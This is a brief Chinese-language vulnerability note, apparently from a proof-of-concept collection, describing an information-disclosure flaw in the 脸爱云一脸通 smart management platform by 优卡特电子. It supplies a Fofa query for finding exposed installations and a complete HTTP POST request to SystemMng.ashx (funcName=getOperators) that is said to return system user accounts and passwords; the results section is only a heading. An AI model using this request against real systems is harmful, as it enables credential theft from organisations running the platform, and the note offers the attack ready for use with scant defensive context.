漏洞描述:
深圳市优卡特电子有限公司脸爱云一脸通智慧管理平台SystemMng.ashx存在信息泄露漏洞,攻击者可以通过此漏洞获取当前系统用户账号及密码等敏感信息。
搜索语法:
Fofa-Query: body="View/UserReserved/UserReservedTest.aspx"
漏洞详情:
1.脸爱云一脸通智慧管理平台。
2.漏洞POC:
POST /SystemMng.ashx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Content-Length: 91
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
page=1&arr_search=%7B%22username%22%3A%22%22%2C%22memo%22%3A%22%22%7D&funcName=getOperators
3.漏洞复现结果。